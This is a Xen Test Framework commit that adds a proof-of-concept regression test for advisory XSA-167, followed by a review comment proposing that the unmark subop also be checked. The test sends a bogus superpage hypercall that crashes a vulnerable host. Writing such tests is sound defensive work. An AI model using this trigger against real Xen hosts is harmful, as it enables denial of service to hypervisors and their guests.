From: Andrew Cooper Date: Fri, 15 Jan 2016 19:41:11 +0000 (+0000) Subject: XSA-167 Proof of Concept test X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=a21a5683f0ce60a9e899e9ca7fa99cad78f67820;p=people%2Froyger%2Fxen-test-framework.git XSA-167 Proof of Concept test Introduce a brand new category called 'xsa' for dedicated XSA tests. Signed-off-by: Andrew Cooper
---
diff --git a/build/common.mk b/build/common.mk
index 227e909..f9bf0c6 100644
--- a/build/common.mk
+++ b/build/common.mk
@@ -3,7 +3,7 @@ DESTDIR ?= $(ROOT)/dist PREFIX ?= $(ROOT) CC = gcc -ALL_CATEGORIES := special functional +ALL_CATEGORIES := special functional xsa ALL_ENVIRONMENTS := pv64 pv32pae hvm64 hvm32pae hvm32
diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 2f8c853..6b3cecf 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -17,4 +17,9 @@ and functionality. @section index-functional Functional tests @subpage test-swint-emulation - Software interrupt emulation for HVM guests. + + +@section index-xsa XSA Proof-of-Concept tests + +@subpage test-xsa-167 - PV superpage sanity checks. */
diff --git a/tests/xsa-167/Makefile b/tests/xsa-167/Makefile
new file mode 100644
index 0000000..0a610ad
--- /dev/null
+++ b/tests/xsa-167/Makefile
@@ -0,0 +1,11 @@
+ROOT := $(abspath $(CURDIR)/../..)
+
+include $(ROOT)/build/common.mk
+
+NAME := xsa-167
+CATEGORY := xsa
+TEST-ENVS := pv64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-167/main.c b/tests/xsa-167/main.c
new file mode 100644
index 0000000..e9cda6e
--- /dev/null
+++ b/tests/xsa-167/main.c
@@ -0,0 +1,67 @@
+/**
+ * @file tests/xsa-167/main.c
+ * @ref test-xsa-167
+ *
+ * @page test-xsa-167 XSA-167
+ *
+ * Advisory: [XSA-167](http://xenbits.xen.org/xsa/advisory-167.html)
+ *
+ * The MMUEXT subops MARK_SUPER and UNMARK_SUPER do not perform a range check
+ * on the `mfn` parameter before indexing the superframe array. They do
+ * however perform an 2MB alignment check.
+ *
+ * This PoC attempts to mark the largest possible 2MB aligned mfn,
+ * `0xffffffffffe00000`, as a superpage. On a sample Xen, the index into the
+ * superframe array causes an attempted deference of the pointer
+ * `0x03ffffffffff8000`, suffering a @#GP fault because of being
+ * non-canonical.
+ *
+ * PV superpages are disabled by default, and must be enabled by booting Xen
+ * with the `"allowsuperpage"` command line option.
+ *
+ * If Xen is vulnerable to XSA-167, the expected outcome of this test is a
+ * host crash. If Xen is not vulnerable, the hypercall should fail with
+ * -EINVAL.
+ *
+ * @sa tests/xsa-167/main.c
+ */
+#include
+
+void test_main(void)
+{
+ printk("XSA-167 PoC\n");
+
+ mmuext_op_t op =
+ {
+ .cmd = MMUEXT_MARK_SUPER,
+ .arg1.mfn = (-1ULL << L2_PT_SHIFT),
+ };
+
+ printk(" Attempting to mark mfn %#lx as a superpage\n", op.arg1.mfn);
+ int rc = hypercall_mmuext_op(&op, 1, NULL, DOMID_SELF);
+
+ switch ( rc )
+ {
+ case -ENOSYS:
+ return xtf_skip("PV superpage support not detected\n");
+
+ case -EINVAL:
+ return xtf_success("Xen correctly rejected the bogus mark attempt\n");
+
+ case 0:
+ return xtf_failure("Marking bogus superpage succeeded\n");
+
+ default:
+ return xtf_error("Unexpected error %d\n", rc);
+ }
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
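Review bot: Only `MMUEXT_MARK_SUPER` is exercised in `test_main`, although the header comment says both MARK_SUPER and UNMARK_SUPER lack the range check, so a fix that guards only the mark path would still be reported as success. In the `-EINVAL` case I would repeat the hypercall on the same `op` with the unmark subop and report success only if that is rejected with -EINVAL as well. This assumes `MMUEXT_UNMARK_SUPER` is defined in the framework's headers and that `xtf_failure` takes a format string the way `xtf_error` does; neither is visible in this hunk.

```c
    /* … unchanged: op setup, first hypercall, -ENOSYS case … */
    case -EINVAL:
        /* The mark was rejected; the unmark subop must reject the same mfn. */
        op.cmd = MMUEXT_UNMARK_SUPER;
        rc = hypercall_mmuext_op(&op, 1, NULL, DOMID_SELF);
        if ( rc != -EINVAL )
            return xtf_failure("Unmark of bogus superpage returned %d\n", rc);

        return xtf_success("Xen correctly rejected the bogus mark and unmark attempts\n");
    /* … unchanged: case 0 and default … */
```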